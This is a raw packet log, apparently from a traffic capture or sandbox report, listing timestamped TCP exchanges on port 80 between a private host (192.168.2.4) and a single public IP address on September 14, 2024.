Sep 14, 2024 18:31:11.346313000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.346349001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346360922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346402884 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.346416950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346427917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346440077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346451998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.346467018 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.346499920 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.347367048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.347390890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.347402096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.347419977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.347454071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.347492933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.347506046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.347515106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.347524881 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.347548008 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.347579002 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.355485916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.355515957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.355525970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.355566978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.355576992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.355587959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.355597019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.355606079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.355690956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.355690956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.355690956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.355690956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.384552956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.384562969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.384610891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.384623051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.384634018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.384644985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.384716988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.384728909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.384737015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.384737015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.384737015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.384831905 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.396035910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.427452087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.427464008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.427470922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.427476883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.427481890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.427488089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.427493095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.427500010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.427939892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.427937984 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.427958965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.427978039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.428040981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.428042889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.428055048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.428066015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.428076029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.428092003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.428097010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.428108931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.428133011 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.428137064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.428148031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.428162098 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.428179026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.428317070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.428328037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.428339005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.428348064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.428363085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.428375006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.428406954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.430103064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.430113077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.430126905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.430144072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.430154085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.430164099 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.430166006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.430201054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.430210114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.430219889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.430273056 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.430309057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.430320024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.430362940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.430938005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431029081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431042910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431052923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431083918 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.431122065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431133032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431143999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431154966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431159973 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.431205988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.431731939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431742907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431755066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431786060 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.431812048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431823969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431833982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431844950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431863070 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.431895018 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.431960106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431972027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431982040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.431993008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432003975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432013988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.432044983 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.432065010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432074070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432116032 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.432157993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432168961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432178974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432188988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432199955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432209015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432212114 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.432221889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432230949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432234049 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.432255983 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.432285070 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.432313919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432322979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432344913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432356119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432364941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432378054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432384968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.432389021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432400942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432409048 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.432457924 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.432457924 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.432518959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432529926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432539940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432552099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432564020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432574987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432585001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.432595015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.432637930 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.432637930 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.433228016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433238983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433255911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433265924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433276892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433283091 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.433289051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433316946 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.433335066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.433428049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433439970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433449984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433459997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433470011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433480978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433486938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.433494091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433526039 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.433526039 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.433554888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.433590889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433603048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433612108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433620930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433633089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433643103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433653116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433661938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433661938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.433682919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433692932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433701992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.433703899 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433715105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433726072 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.433733940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433743954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.433746099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433758020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433768034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.433768988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.433804989 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.433834076 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.442553043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.442569017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.442581892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.442632914 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.442676067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.442687035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.442697048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.442707062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.442732096 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.442763090 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.471534014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.471618891 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.471720934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.471730947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.471741915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.471752882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.471765041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.471776009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.471787930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.471905947 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.471906900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.471906900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.514302969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514365911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514369965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514375925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514379978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514384985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514415979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514420986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514651060 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.514777899 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514786959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514825106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514841080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.514856100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514868021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514873981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.514878988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514913082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.514942884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514954090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.514996052 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.515172005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.515182972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.515192032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.515227079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.515244007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.515249968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.515255928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.515268087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.515278101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.515292883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.515295982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.515337944 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.517178059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.517189980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.517199993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.517210960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.517242908 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.517257929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.517268896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.517280102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.517288923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.517297029 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.517297029 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.517332077 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.517911911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.517923117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.517934084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.517951965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.517962933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.517968893 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.518003941 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.518008947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518022060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518023968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.518083096 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.518485069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518495083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518539906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518549919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.518562078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518579960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518626928 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.518677950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518690109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518699884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518712997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518731117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518733978 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.518764973 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.518783092 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.518789053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518802881 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518863916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.518934011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518944979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518955946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518965960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518976927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.518986940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.518989086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519000053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519025087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.519032001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519043922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519052982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.519057035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519068956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519081116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519083977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.519092083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519104958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519108057 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.519115925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519153118 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.519153118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519169092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519182920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519195080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519207001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519208908 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.519229889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.519263983 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.519294977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519313097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519324064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519335032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519347906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:11.519377947 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.519407034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:11.519414902 CEST	80	49738	172.67.203.195	192.168.2.4
